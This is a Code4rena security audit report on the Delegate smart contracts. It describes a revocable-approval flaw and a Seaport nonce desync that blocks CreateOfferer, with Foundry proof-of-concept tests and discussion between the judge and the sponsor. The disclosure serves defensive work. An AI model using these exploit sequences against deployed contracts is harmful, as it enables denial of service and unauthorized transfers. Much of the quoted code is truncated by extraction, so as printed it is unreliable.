Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Delegate smart contract system written in Solidity. The audit took place between September 5—September 11 2023.


17 Wardens contributed reports to the Delegate:

  1. ladboy233
  2. d4r3d3v1l
  3. DadeKuma
  4. pfapostol
  5. Sathish9098
  6. Baki (Viraz and supernova)
  7. p0wd3r
  8. m4ttm
  9. Banditx0x
  10. gkrastenov
  11. Fulum
  12. sces60107
  13. Brenzee
  14. kodyvim
  15. lsaudit
  16. lodelux

This audit was judged by Alex the Entreprenerd.

Final report assembled by liveactionllama.


The C4 analysis yielded an aggregated total of 2 unique vulnerabilities. Of these vulnerabilities, 0 received a risk rating in the category of HIGH severity and 2 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 10 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 2 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Delegate repository, and is composed of 12 smart contracts written in the Solidity programming language and includes 1,824 lines of Solidity code.

In addition to the known issues identified by the project team, a Code4rena bot race was conducted at the start of the audit. The winning bot, Hound from warden DadeKuma, generated the Automated Findings report and all findings therein were classified as out of scope.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

Medium Risk Findings (2)

[M-01] No way to revoke Approval in DelegateToken.approve leads to unauthorized calling of DelegateToken.transferFrom

Submitted by d4r3d3v1l

There is no way to revoke the approval which given via DelegateToken.approve(address,delegateTokenId). They can able call the DelegateToken.transferFrom even the tokenHolder revoke the permission using the DelegateToken.setApprovalForAll.

If the spender address is approved by the PT token, we can call the DelegateToken.withdraw.

Proof of Concept

Alice is the token Holder.

Alice approves Bob via DelegateToken.setApprovalForAll(Bob,true).

Bob approves himself using DelegateToken.approve(Bob,delegateTokenId)

Alice revokes the Bob approval by calling DelegateToken.setApprovalForAll(Bob,false);

Now Bob can still calls the DelegateToken.transferFrom(Alice,to,delegateTokenId) which is subjected to call only by approved address.

The transfer will be successful.

Code details

function revertNotApprovedOrOperator(
        mapping(address account => mapping(address operator => bool enabled)) storage accountOperator,
        mapping(uint256 delegateTokenId => uint256[3] info) storage delegateTokenInfo,
        address account,
        uint256 delegateTokenId
    ) internal view {
        if (msg.sender == account || accountOperator[account][msg.sender] || msg.sender == readApproved(delegateTokenInfo, delegateTokenId)) return;
        revert Errors.NotApproved(msg.sender, delegateTokenId);

Even after revoking the approval for operator using setApprovalAll this msg.sender == readApproved(delegateTokenInfo, delegateTokenId) will be true and able to call transferFrom function.

Test function

function testFuzzingTransfer721(
        address from,
        address to,
        uint256 underlyingTokenId,
        bool expiryTypeRelative,
        uint256 time
    ) public {
        vm.assume(from != address(0));
        vm.assume(from != address(dt));

            /* ExpiryType */
            uint256 expiry, /* ExpiryValue */

        ) = prepareValidExpiry(expiryTypeRelative, time);, 33);

        mockERC721.setApprovalForAll(address(dt), true);

        dt.setApprovalForAll(address(dt), true);
        uint256 delegateId1 = dt.create(
            SALT + 1

        dt.approve(address(dt), delegateId1);


        dt.setApprovalForAll(address(dt), false);
        address tmp = dt.getApproved(delegateId1);
        dt.transferFrom(from, address(0x320), delegateId1);

If token Holder revokes the approval for a operator using DelegateToken.setApprovalForAll, revoke the all the approvals(DelegateToken.approve) which is done by the operator.

Assessed type

Access Control

0xfoobar (Delegate) confirmed and commented:

Need to double-check, but looks plausible.

Alex the Entreprenerd (judge) commented:

In contrast to ERC721, which only allows the owner to change approve

DT.approve allows the operator to set themselves as approved, which can technically be undone via a multicall but may not be performed under normal usage.

Alex the Entreprenerd (judge) decreased severity to Medium and commented:

Leaning towards Medium Severity as the finding requires:

  • Alice approvesForAll Bob
  • Bob approves self
  • Alice revokes Bobs approvalForAll
  • Alice doesn’t revoke the _approve that Bob gave to self

Notice that any transfer would reset the approval as well.

0xfoobar (Delegate) commented:

A note about how ERC721 works: there are two different types of approvals. approve() lets an account move a single tokenId, while setApprovalForAll() marks an address as an operator to move all tokenIds. We can note the difference in the core OpenZeppelin ERC721 base contract, two separate mappings:

So plausible that an operator could be permitted to add new tokenid-specific approvals, but see your point that OZ ERC721 doesn’t allow this by default and so could lead to confusing states that are possible but not fun to get out of.

[M-02] CreateOfferer.sol should not enforce the nonce incremented sequentially, otherwise user can DOS the contract by skipping order

Submitted by ladboy233

According to

“Seaport v1.2 introduced support for a new type of order: the contract order. In brief, a smart contract that implements the ContractOffererInterface (referred to as an “Seaport app contract” or ‘Seaport app’ in the docs and a ‘contract offerer’ in the code) can now provide a dynamically generated order (a contract order) in response to a buyer or seller’s contract order request.”

The CreateOfferer.sol aims to be comply with the interface ContractOffererInterface.

The life cycle of the contract life cycle here is here:

First the function _getGeneratedOrder is called.

Then after the order execution, the function ratifyOrder is triggered for contract (CreateOfferer.sol) to do post order validation.

In the logic of ratifyOrder, the nonce is incremented by calling this line of code Helpers.processNonce.

function ratifyOrder(SpentItem[] calldata offer, ReceivedItem[] calldata consideration, bytes calldata context, bytes32[] calldata, uint256 contractNonce)
	checkStage(Enums.Stage.ratify, Enums.Stage.generate)
	returns (bytes4)
	Helpers.processNonce(nonce, contractNonce);
	Helpers.verifyCreate(delegateToken, offer[0].identifier, transientState.receivers, consideration[0], context);
	return this.ratifyOrder.selector;

This is calling this line of code.

function processNonce(CreateOffererStructs.Nonce storage nonce, uint256 contractNonce) internal {
	if (nonce.value != contractNonce) revert CreateOffererErrors.InvalidContractNonce(nonce.value, contractNonce);
	unchecked {
	} // Infeasible this will overflow if starting point is zero

The CreateOffererStructs.Nonce data structure is just nonce.

library CreateOffererStructs {
    /// @notice Used to track the stage and lock status
    struct Stage {
        CreateOffererEnums.Stage flag;
        CreateOffererEnums.Lock lock;

    /// @notice Used to keep track of the seaport contract nonce of CreateOfferer
    struct Nonce {
        uint256 value;

But this is not how Seaport contract track contract nonce.

On Seaport contract, we are calling _getGeneratedOrder.

Which calls _callGenerateOrder.

	// Do a low-level call to get success status and any return data.
	(bool success, bytes memory returnData) = _callGenerateOrder(

		// Increment contract nonce and use it to derive order hash.
		// Note: nonce will be incremented even for skipped orders, and
		// even if generateOrder's return data doesn't meet constraints.
		uint256 contractNonce = (

		// Derive order hash from contract nonce and offerer address.
		orderHash = bytes32(
			contractNonce ^
				(uint256(uint160(orderParameters.offerer)) << 96)

As we can see:

// Increment contract nonce and use it to derive order hash.
// Note: nonce will be incremented even for skipped orders, and
// even if generateOrder's return data doesn't meet constraints.
uint256 contractNonce = (

Nonce will be incremented even for skipped orders.

This is very important, suppose the low level call _callGenerateOrder return false, we are hitting the else block.

 return _revertOrReturnEmpty(revertOnInvalid, orderHash);

This is calling _revertOrReturnEmpty.

function _revertOrReturnEmpty(
	bool revertOnInvalid,
	bytes32 contractOrderHash
	returns (
		bytes32 orderHash,
		uint256 numerator,
		uint256 denominator,
		OrderToExecute memory emptyOrder
	// If invalid input should not revert...
	if (!revertOnInvalid) {
		// Return the contract order hash and zero values for the numerator
		// and denominator.
		return (contractOrderHash, 0, 0, emptyOrder);

	// Otherwise, revert.
	revert InvalidContractOrder(contractOrderHash);

Clearly we can see that if the flag revertOnInvalid is set to false, then even the low level call return false, the nonce of the offerer is still incremented.

Where in the Seaport code does it set revertOnInvalid to false?

When the Seaport wants to combine multiple orders in this line of code.

    function _fulfillAvailableAdvancedOrders(
        AdvancedOrder[] memory advancedOrders,
        CriteriaResolver[] memory criteriaResolvers,
        FulfillmentComponent[][] memory offerFulfillments,
        FulfillmentComponent[][] memory considerationFulfillments,
        bytes32 fulfillerConduitKey,
        address recipient,
        uint256 maximumFulfilled
    ) internal returns (bool[] memory, /* availableOrders */ Execution[] memory /* executions */ ) {
        // Validate orders, apply amounts, & determine if they use conduits.
        (bytes32[] memory orderHashes, bool containsNonOpen) = _validateOrdersAndPrepareToFulfill(
            false, // Signifies that invalid orders should NOT revert.

We call _validateOrderAndUpdateStatus.

// Validate it, update status, and determine fraction to fill.
(bytes32 orderHash, uint256 numerator, uint256 denominator) =
_validateOrderAndUpdateStatus(advancedOrder, revertOnInvalid);

Finally we call the logic _getGeneratedOrder(orderParameters, advancedOrder.extraData, revertOnInvalid) below with parameter revertOnInvalid false.

  // If the order is a contract order, return the generated order.
	if (orderParameters.orderType == OrderType.CONTRACT) {
		// Ensure that the numerator and denominator are both equal to 1.
		assembly {
			// (1 ^ nd =/= 0) => (nd =/= 1) => (n =/= 1) || (d =/= 1)
			// It's important that the values are 120-bit masked before
			// multiplication is applied. Otherwise, the last implication
			// above is not correct (mod 2^256).
			invalidFraction := xor(mul(numerator, denominator), 1)

		// Revert if the supplied numerator and denominator are not valid.
		if (invalidFraction) {

		// Return the generated order based on the order params and the
		// provided extra data. If revertOnInvalid is true, the function
		// will revert if the input is invalid.
		return _getGeneratedOrder(orderParameters, advancedOrder.extraData, revertOnInvalid);

Ok what does this mean?

Suppose the CreateOfferer.sol fulfills two orders and creates two delegate tokens.

The nonces start from 0 and then increment to 1 and then increment to 2.

A user crafts a contract with malformed minimumReceived and combines with another valid order to call OrderCombine.

As we can see above, when multiple order is passed in, the revertOnInvalid is set to false, so the contract order from CreateOfferer.sol is skipped, but the nonce is incremented.

Then the nonce tracked by CreateOfferer.sol internally is out of sync with the contract nonce in seaport contract forever.

Then the CreateOfferer.sol is not usable because if the ratifyOrder callback hit the contract, transaction revert in this check.

 if (nonce.value != contractNonce) revert CreateOffererErrors.InvalidContractNonce(nonce.value, contractNonce);

I would recommend do not validate the order execution in the ratifyOrder call back by using the contract nonce, instead, validate the order using orderHash.

if (
uint256(orderHash) ^ (uint256(uint160(offerer)) << 96)
) != ContractOffererInterface.ratifyOrder.selector

Assessed type


0xfoobar (Delegate) confirmed and commented:

Need to double-check but looks plausible.

Alex the Entreprenerd (judge) commented:

_callGenerateOrder is caught, and in case of multiple order will be incrementing nonce without reverting.


    function _callGenerateOrder(
        OrderParameters memory orderParameters,
        bytes memory context,
        SpentItem[] memory originalOfferItems,
        SpentItem[] memory originalConsiderationItems
    ) internal returns (bool success, bytes memory returnData) {

The call to generateOrder will revert at processSpentItems.


        if (!(minimumReceived.length == 1 && maximumSpent.length == 1)) revert CreateOffererErrors.NoBatchWrapping();

This will cause the nonce to be increased in Seaport but not on the CreateOfferer.

Alex the Entreprenerd (judge) commented:

Have asked the Warden for a Coded POC.
Have reached out to Seaport Devs to ask for advice as to whether the issue is valid.

Alex the Entreprenerd (judge) commented:

Coded POC from the warden.

0xfoobar (Delegate) disagreed with severity and commented:

Believe issue is valid, would love confirmation from Seaport devs if you have it. Believe this should be a quality Medium not High because CreateOfferer is tangential to the core protocol, would not cause any loss of user funds if abused, and could be easily replaced if DoS-ed. Appreciate the detailed work to dive into the workings of Seaport nonces.

Alex the Entreprenerd (judge) decreased severity to Medium and commented:

Agree with impact from Sponsor. Temporarly marking as valid; however, we will not confirm until runnable POC is produced.

ladboy233 (warden) commented:

Agree with sponsor’s severity assessment!

Fully runnable POC to show the nonce is out of sync.

The Contract offerer internal nonce is tracked in this line of code.

While the contract offerer nonce on Seaport side can be acquired by calling:


And indeed if we use fulfillAvailableAdvancedOrder to fulfill only one contract order and revert in other order, nonce is still incremented.

     uint256 seaport_contrat_offer_1_nonce = seaport.getContractOffererNonce(address(contractOfferer1));
        console2.log(seaport_contrat_offer_1_nonce); // the nonce of contract offerer on seaport is 1 is 1!!
        uint256 oldNonce = contractOfferer1.nonce(); // the none of contract offerer 1 is 0!

A more detailed explanation is here.

Alex the Entreprenerd (judge) commented:


  mockERC721.ownerOf(1) 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  mockERC721.ownerOf(2) 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  setRevert true
  mockERC721.ownerOf(1) 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  mockERC721.ownerOf(2) 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  Sent ETH to SEAPORT true
  fulfilled true
  mockERC721.ownerOf(1) 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496
  mockERC721.ownerOf(2) 0xa0Cb889707d426A7A386870A03bc70d1b0697598

As shown by the logs, the Token 1 is not transfered, but the nonce is consumed.

// SPDX-License-Identifier: CC0-1.0
pragma solidity ^0.8.21;

import {Test} from "forge-std/Test.sol";
import {BaseSeaportTest} from "./base/BaseSeaportTest.t.sol";
import {BaseLiquidDelegateTest} from "./base/BaseLiquidDelegateTest.t.sol";
import {SeaportHelpers, User} from "./utils/SeaportHelpers.t.sol";
import {IDelegateToken, Structs as IDelegateTokenStructs} from "src/interfaces/IDelegateToken.sol";
import {IDelegateRegistry} from "delegate-registry/src/IDelegateRegistry.sol";
import {AdvancedOrder, OrderParameters, Fulfillment, CriteriaResolver, OfferItem, ConsiderationItem, FulfillmentComponent} from "seaport/contracts/lib/ConsiderationStructs.sol";
import {ItemType, OrderType} from "seaport/contracts/lib/ConsiderationEnums.sol";
import {SpentItem} from "seaport/contracts/interfaces/ContractOffererInterface.sol";

import {CreateOfferer, Enums as OffererEnums, Structs as OffererStructs} from "src/CreateOfferer.sol";
import {MockERC721} from "./mock/MockTokens.t.sol";
import {WETH} from "./mock/WETH.t.sol";

import {console2} from "forge-std/console2.sol";

import {IERC721} from "openzeppelin/token/ERC721/IERC721.sol";

import {IERC1155} from "openzeppelin/token/ERC1155/IERC1155.sol";

import {ItemType} from "seaport/contracts/lib/ConsiderationEnums.sol";

import {ContractOffererInterface, SpentItem, ReceivedItem, Schema} from "seaport/contracts/interfaces/ContractOffererInterface.sol";

interface ISeaport {
    function getContractOffererNonce(address contractOfferer) external view returns (uint256 nonce);

abstract contract ERC165 {
     * @dev See {IERC165-supportsInterface}.
    function supportsInterface(bytes4 interfaceId) public view returns (bool) {
        return interfaceId == bytes4(keccak256("supportsInterface(bytes4)"));

 * @title TestContractOffererNativeToken
contract TestContractOffererNativeToken is ContractOffererInterface, ERC165 {
    error OrderUnavailable();

    address private immutable _SEAPORT;

    SpentItem private _available;
    SpentItem private _required;

    bool public ready;
    bool public fulfilled;

    uint256 public extraAvailable;
    uint256 public extraRequired;

    bool reverting = false;
    uint256 public nonce = 0;
    address public otherContract;

    string public name;

    event ShowName(string name);

    event NumberUpdated(uint256 number);

    constructor(address seaport, string memory _name) {
        // Set immutable values and storage variables.
        _SEAPORT = seaport;
        fulfilled = false;
        ready = false;
        extraAvailable = 0;
        extraRequired = 0;
        name = _name;

    function setRevert(bool state) public {
        console2.log("setRevert", state);
        reverting = state;

    receive() external payable {}

    function activate(SpentItem memory available, SpentItem memory required) public payable {
        if (ready || fulfilled) {
            revert OrderUnavailable();

        // Set storage variables.
        _available = available;
        _required = required;
        ready = true;

    /// In case of criteria based orders and non-wildcard items, the member
    /// `available.identifier` would correspond to the `identifierOrCriteria`
    /// i.e., the merkle-root.
    /// @param identifier corresponds to the actual token-id that gets transferred.
    function activateWithCriteria(SpentItem memory available, SpentItem memory required, uint256 identifier) public {
        if (ready || fulfilled) {
            revert OrderUnavailable();

        if (available.itemType == ItemType.ERC721_WITH_CRITERIA) {
            IERC721 token = IERC721(available.token);

            token.transferFrom(msg.sender, address(this), identifier);

            token.setApprovalForAll(_SEAPORT, true);
        } else if (available.itemType == ItemType.ERC1155_WITH_CRITERIA) {
            IERC1155 token = IERC1155(available.token);

            token.safeTransferFrom(msg.sender, address(this), identifier, available.amount, "");

            token.setApprovalForAll(_SEAPORT, true);

        // Set storage variables.
        _available = available;
        _required = required;
        ready = true;

    function extendAvailable() public {
        if (!ready || fulfilled) {
            revert OrderUnavailable();


        _available.amount /= 2;

    function extendRequired() public {
        if (!ready || fulfilled) {
            revert OrderUnavailable();


    function generateOrder(address, SpentItem[] calldata minimumReceived, SpentItem[] calldata maximumSpent, bytes calldata /* context */ )
        returns (SpentItem[] memory offer, ReceivedItem[] memory consideration)
        emit ShowName(name);
        // Set the offer and consideration that were supplied during deployment.
        if (reverting) {
            revert("revert here");

        if (otherContract != address(0)) {
            uint256 result = ISeaport(_SEAPORT).getContractOffererNonce(otherContract);
            console2.log("result", result);
            emit NumberUpdated(result);
            uint256 oldNonce = TestContractOffererNativeToken(payable(otherContract)).nonce();
            emit NumberUpdated(oldNonce);

        offer = new SpentItem[](1);
        consideration = new ReceivedItem[](1);

        // Send eth to Seaport.
        (bool success,) ={value: minimumReceived[0].amount}("");
        console2.log("Sent ETH to SEAPORT", success);

        // revert("error");

        // Revert if transaction fails.
        if (!success) {
            assembly {
                returndatacopy(0, 0, returndatasize())
                revert(0, returndatasize())

        // Set the offer item as the _available item in storage.
        offer[0] = minimumReceived[0];

        // Set the erc721 consideration item.
        consideration[0] = ReceivedItem({
            itemType: ItemType.ERC721,
            token: maximumSpent[0].token,
            identifier: maximumSpent[0].identifier,
            amount: maximumSpent[0].amount,
            recipient: payable(address(this))

        // Update storage to reflect that the order has been fulfilled.
        fulfilled = true;
        console2.log("fulfilled", fulfilled);

    function previewOrder(address caller, address, SpentItem[] calldata, SpentItem[] calldata, bytes calldata context)
        returns (SpentItem[] memory offer, ReceivedItem[] memory consideration)
        // Ensure the caller is Seaport & the order has not yet been fulfilled.
        if (!ready || fulfilled || caller != _SEAPORT || context.length != 0) {
            revert OrderUnavailable();

        // Set the offer and consideration that were supplied during deployment.
        offer = new SpentItem[](1 + extraAvailable);
        consideration = new ReceivedItem[](1 + extraRequired);

        for (uint256 i = 0; i < 1 + extraAvailable; ++i) {
            offer[i] = _available;

        for (uint256 i = 0; i < 1 + extraRequired; ++i) {
            consideration[i] =
                ReceivedItem({itemType: _required.itemType, token: _required.token, identifier: _required.identifier, amount: _required.amount, recipient: payable(address(this))});

    function getInventory() external view returns (SpentItem[] memory offerable, SpentItem[] memory receivable) {
        // Set offerable and receivable supplied at deployment if unfulfilled.
        if (!ready || fulfilled) {
            offerable = new SpentItem[](0);

            receivable = new SpentItem[](0);
        } else {
            offerable = new SpentItem[](1 + extraAvailable);
            for (uint256 i = 0; i < 1 + extraAvailable; ++i) {
                offerable[i] = _available;

            receivable = new SpentItem[](1 + extraRequired);
            for (uint256 i = 0; i < 1 + extraRequired; ++i) {
                receivable[i] = _required;

    function ratifyOrder(
        SpentItem[] calldata, /* offer */
        ReceivedItem[] calldata, /* consideration */
        bytes calldata, /* context */
        bytes32[] calldata, /* orderHashes */
        uint256 /* contractNonce */
    ) external pure returns (bytes4 /* ratifyOrderMagicValue */ ) {
        return ContractOffererInterface.ratifyOrder.selector;

    function onERC1155Received(address, address, uint256, uint256, bytes calldata) external pure returns (bytes4) {
        return bytes4(0xf23a6e61);

    // function supportsInterface(
    //     bytes4 interfaceId
    // )
    //     public
    //     view
    //     virtual
    //     override(ERC165, ContractOffererInterface)
    //     returns (bool)
    // {
    //     return
    //         interfaceId == type(ContractOffererInterface).interfaceId ||
    //         super.supportsInterface(interfaceId);
    // }

     * @dev Returns the metadata for this contract offerer.
    function getSeaportMetadata()
        returns (
            string memory name,
            Schema[] memory schemas // map to Seaport Improvement Proposal IDs
        schemas = new Schema[](1);
        schemas[0].id = 1337;
        schemas[0].metadata = new bytes(0);

        return ("TestContractOffererNativeToken", schemas);

contract CreateOffererTest is Test, BaseSeaportTest, BaseLiquidDelegateTest, SeaportHelpers {
    CreateOfferer createOfferer;
    WETH weth;
    uint256 startGas;
    User buyer;
    User seller;

    OfferItem offerItem;
    ConsiderationItem considerationItem;
    OfferItem[] offerItems;
    ConsiderationItem[] considerationItems;
    SpentItem[] minimumReceived;
    SpentItem[] maximumSpent;

    function setUp() public {
        OffererStructs.Parameters memory createOffererParameters =
            OffererStructs.Parameters({seaport: address(seaport), delegateToken: address(dt), principalToken: address(principal)});
        createOfferer = new CreateOfferer(createOffererParameters);
        weth = new WETH();
        // Setup buyer and seller
        seller = makeUser("seller");
        vm.label(seller.addr, "seller");
        buyer = makeUser("buyer");
        vm.label(buyer.addr, "buyer");

    function addOfferItem(OfferItem memory _offerItem) internal {

    ///@dev reset the offer items array
    function resetOfferItems() internal {
        delete offerItems;

    ///@dev Construct and an offer item to the offer items array
    function addOfferItem(ItemType itemType, address token, uint256 identifier, uint256 startAmount, uint256 endAmount) internal {
        offerItem.itemType = itemType;
        offerItem.token = token;
        offerItem.identifierOrCriteria = identifier;
        offerItem.startAmount = startAmount;
        offerItem.endAmount = endAmount;
        delete offerItem;

    function addOfferItem(ItemType itemType, address token, uint256 identifier, uint256 amount) internal {
        addOfferItem({itemType: itemType, token: token, identifier: identifier, startAmount: amount, endAmount: amount});

    function addOfferItem(ItemType itemType, uint256 identifier, uint256 startAmount, uint256 endAmount) internal {
        if (itemType == ItemType.NATIVE) {
            addEthOfferItem(startAmount, endAmount);
        } else if (itemType == ItemType.ERC20) {
            addErc20OfferItem(startAmount, endAmount);
        } else if (itemType == ItemType.ERC1155) {
            addErc1155OfferItem(identifier, startAmount, endAmount);
        } else {

    function addOfferItem(ItemType itemType, uint256 identifier, uint256 amt) internal {
        addOfferItem(itemType, identifier, amt, amt);

    function addErc721OfferItem(uint256 identifier) internal {
        addErc721OfferItem(address(mockERC721), identifier);

    function addErc721OfferItem(address token, uint256 identifier) internal {
        addErc721OfferItem(token, identifier, 1, 1);

    function addErc721OfferItem(address token, uint256 identifier, uint256 amount) internal {
        addErc721OfferItem(token, identifier, amount, amount);

    function addErc721OfferItem(address token, uint256 identifier, uint256 startAmount, uint256 endAmount) internal {
        addOfferItem(ItemType.ERC721, token, identifier, startAmount, endAmount);

    function addErc1155OfferItem(uint256 tokenId, uint256 amount) internal {
        addOfferItem(ItemType.ERC1155, address(mockERC1155), tokenId, amount, amount);

    function addErc20OfferItem(uint256 startAmount, uint256 endAmount) internal {
        addOfferItem(ItemType.ERC20, address(mockERC20), 0, startAmount, endAmount);

    function addErc20OfferItem(uint256 amount) internal {
        addErc20OfferItem(amount, amount);

    function addErc1155OfferItem(uint256 tokenId, uint256 startAmount, uint256 endAmount) internal {
        addOfferItem(ItemType.ERC1155, address(mockERC1155), tokenId, startAmount, endAmount);

    function addEthOfferItem(uint256 startAmount, uint256 endAmount) internal {
        addOfferItem(ItemType.NATIVE, address(0), 0, startAmount, endAmount);

    function addEthOfferItem(uint256 paymentAmount) internal {
        addEthOfferItem(paymentAmount, paymentAmount);

    ///@dev add a considerationItem to the considerationItems array
    function addConsiderationItem(ConsiderationItem memory _considerationItem) internal {

    ///@dev reset the considerationItems array
    function resetConsiderationItems() internal {
        delete considerationItems;

    ///@dev construct a considerationItem and add it to the considerationItems array
    function addConsiderationItem(address payable recipient, ItemType itemType, address token, uint256 identifier, uint256 startAmount, uint256 endAmount) internal {
        considerationItem.itemType = itemType;
        considerationItem.token = token;
        considerationItem.identifierOrCriteria = identifier;
        considerationItem.startAmount = startAmount;
        considerationItem.endAmount = endAmount;
        considerationItem.recipient = recipient;
        delete considerationItem;

    function addConsiderationItem(address payable recipient, ItemType itemType, uint256 identifier, uint256 amt) internal {
        if (itemType == ItemType.NATIVE) {
            addEthConsiderationItem(recipient, amt);
        } else if (itemType == ItemType.ERC20) {
            addErc20ConsiderationItem(recipient, amt);
        } else if (itemType == ItemType.ERC1155) {
            addErc1155ConsiderationItem(recipient, identifier, amt);
        } else {
            addErc721ConsiderationItem(recipient, identifier);

    function addEthConsiderationItem(address payable recipient, uint256 paymentAmount) internal {
        addConsiderationItem(recipient, ItemType.NATIVE, address(0), 0, paymentAmount, paymentAmount);

    function addEthConsiderationItem(address payable recipient, uint256 startAmount, uint256 endAmount) internal {
        addConsiderationItem(recipient, ItemType.NATIVE, address(0), 0, startAmount, endAmount);

    function addErc20ConsiderationItem(address payable receiver, uint256 startAmount, uint256 endAmount) internal {
        addConsiderationItem(receiver, ItemType.ERC20, address(mockERC20), 0, startAmount, endAmount);

    function addErc20ConsiderationItem(address payable receiver, uint256 paymentAmount) internal {
        addErc20ConsiderationItem(receiver, paymentAmount, paymentAmount);

    function addErc721ConsiderationItem(address payable recipient, uint256 tokenId) internal {
        addConsiderationItem(recipient, ItemType.ERC721, address(mockERC721), tokenId, 1, 1);

    function addErc1155ConsiderationItem(address payable recipient, uint256 tokenId, uint256 amount) internal {
        addConsiderationItem(recipient, ItemType.ERC1155, address(mockERC1155), tokenId, amount, amount);

    receive() external payable {}

    /// @dev Example of setting up one order
    function test_single_POC() public {
        TestContractOffererNativeToken contractOfferer1 = new TestContractOffererNativeToken(
            );, 100 ether);

        mockERC721.setApprovalForAll(address(contractOfferer1), true);
        mockERC721.setApprovalForAll(address(seaport), true);, 1);

        addEthOfferItem(1 ether);
        addErc721ConsiderationItem(payable(address(contractOfferer1)), 1);

        OrderParameters memory orderParameters1 = OrderParameters(
            block.timestamp + 1000,

        AdvancedOrder memory advancedOrder1 = AdvancedOrder(orderParameters1, 1, 1, "", "");

        FulfillmentComponent[][] memory offerFulfillments = new FulfillmentComponent[][](1);
        offerFulfillments[0] = new FulfillmentComponent[](1);
        offerFulfillments[0][0] = FulfillmentComponent(0, 0);

        // Create considerationFulfillments 2D array similarly
        FulfillmentComponent[][] memory considerationFulfillments = new FulfillmentComponent[][](1);
        considerationFulfillments[0] = new FulfillmentComponent[](1);
        considerationFulfillments[0][0] = FulfillmentComponent(0, 0);

        // contractOfferer1.setRevert(true);

        AdvancedOrder[] memory orders = new AdvancedOrder[](1);
        orders[0] = advancedOrder1;

        seaport.fulfillAvailableAdvancedOrders(orders, new CriteriaResolver[](0), offerFulfillments, considerationFulfillments, bytes32(0), address(this), 100);

    function test_POC() public {
        TestContractOffererNativeToken contractOfferer1 = new TestContractOffererNativeToken(
            );, 100 ether);

        mockERC721.setApprovalForAll(address(contractOfferer1), true);
        mockERC721.setApprovalForAll(address(seaport), true);, 1);

        console2.log("mockERC721.ownerOf(1)", mockERC721.ownerOf(1));

        addEthOfferItem(1 ether);
        addErc721ConsiderationItem(payable(address(contractOfferer1)), 1);

        OrderParameters memory orderParameters1 = OrderParameters(
            block.timestamp + 1000,

        AdvancedOrder memory advancedOrder1 = AdvancedOrder(orderParameters1, 1, 1, "", "");


        TestContractOffererNativeToken contractOfferer2 = new TestContractOffererNativeToken(
            );, 100 ether);

        mockERC721.setApprovalForAll(address(contractOfferer2), true);
        mockERC721.setApprovalForAll(address(seaport), true);, 2);

        addEthOfferItem(1 ether);
        addErc721ConsiderationItem(payable(address(contractOfferer2)), 2);

        console2.log("mockERC721.ownerOf(2)", mockERC721.ownerOf(2));


        OrderParameters memory orderParameters2 = OrderParameters(
            block.timestamp + 1000,

        AdvancedOrder memory advancedOrder2 = AdvancedOrder(orderParameters2, 1, 1, "", "");

        // FulfillmentComponent[][] memory offerFulfillments = new FulfillmentComponent[][](2);
        // offerFulfillments[0] = new FulfillmentComponent[](2);
        // offerFulfillments[0][0] = FulfillmentComponent(1, 0);
        // offerFulfillments[0][1] = FulfillmentComponent(1, 1);

        // // Create considerationFulfillments 2D array similarly
        // FulfillmentComponent[][] memory considerationFulfillments = new FulfillmentComponent[][](2);
        // considerationFulfillments[0] = new FulfillmentComponent[](2);
        // considerationFulfillments[0][0] = FulfillmentComponent(1, 0);
        // considerationFulfillments[0][1] = FulfillmentComponent(1, 1);

        FulfillmentComponent[][] memory offerFulfillments = new FulfillmentComponent[][](2);
        offerFulfillments[0] = new FulfillmentComponent[](offerItems.length);
        offerFulfillments[1] = new FulfillmentComponent[](offerItems.length);

        FulfillmentComponent[][] memory considerationFulfillments = new FulfillmentComponent[][](2);
        considerationFulfillments[0] = new FulfillmentComponent[](considerationItems.length);
        considerationFulfillments[1] = new FulfillmentComponent[](considerationItems.length);

        for (uint256 i = 0; i < offerItems.length; i++) {
            offerFulfillments[0][i] = FulfillmentComponent(0, i);

        for (uint256 i = 0; i < considerationItems.length; i++) {
            considerationFulfillments[0][i] = FulfillmentComponent(0, i);

        for (uint256 i = 0; i < offerItems.length; i++) {
            offerFulfillments[1][i] = FulfillmentComponent(1, i);

        for (uint256 i = 0; i < considerationItems.length; i++) {
            considerationFulfillments[1][i] = FulfillmentComponent(1, i);

        AdvancedOrder[] memory orders = new AdvancedOrder[](2);
        orders[0] = advancedOrder1;
        orders[1] = advancedOrder2;

        console2.log("mockERC721.ownerOf(1)", mockERC721.ownerOf(1));
        console2.log("mockERC721.ownerOf(2)", mockERC721.ownerOf(2));

        seaport.fulfillAvailableAdvancedOrders(orders, new CriteriaResolver[](0), offerFulfillments, considerationFulfillments, bytes32(0), address(this), 100);

        uint256 seaport_contrat_offer_1_nonce = seaport.getContractOffererNonce(address(contractOfferer1));
        console2.log(seaport_contrat_offer_1_nonce); // the nonce of contract offerer on seaport is 1 is 1!!
        uint256 oldNonce = contractOfferer1.nonce(); // the none of contract offerer 1 is 0!

        // Proof also by showing that we can re-do Order 1 but nonces are deSynched
        console2.log("mockERC721.ownerOf(1)", mockERC721.ownerOf(1));
        console2.log("mockERC721.ownerOf(2)", mockERC721.ownerOf(2));


Low Risk and Non-Critical Issues

For this audit, 10 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by DadeKuma received the top score from the judge.

The following wardens also submitted reports: p0wd3r, gkrastenov, Fulum, sces60107, Brenzee, kodyvim, lsaudit, ladboy233, and lodelux.

[01] previewOrder should not revert

The official documentation says that previewOrder should not revert, as it may cause issues to the caller:

